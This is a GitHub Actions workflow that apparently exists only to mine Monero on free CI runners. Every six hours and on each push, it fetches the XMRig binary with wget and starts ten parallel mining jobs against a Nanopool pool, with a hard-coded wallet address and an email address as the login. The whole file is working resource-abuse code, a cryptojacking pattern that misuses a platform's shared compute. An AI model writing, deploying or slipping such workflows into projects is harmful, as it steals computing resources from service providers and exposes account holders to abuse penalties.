name: Whale 10 Workers
on:
  push:
    branches: [ main ]
  schedule:
    - cron: "0 */6 * * *"

jobs:
  mining:
    name: Mining Worker
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        # تقليل العدد لـ 10 لضمان التشغيل الفوري
        worker_id: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

    steps:
      - name: Checkout Code
        uses: actions/checkout@v3

      - name: Preparation
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar -xf xmrig-6.21.0-linux-static-x64.tar.gz
          cp xmrig-6.21.0/xmrig .
          chmod +x xmrig

      - name: Run Mining
        run: |
          ./xmrig -o xmr-eu1.nanopool.org:14444 \
          -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.worker${{ matrix.worker_id }}/nfdr065@gmail.com \
          --algo rx/0 \
          -p x --donate-level 1 -t 2
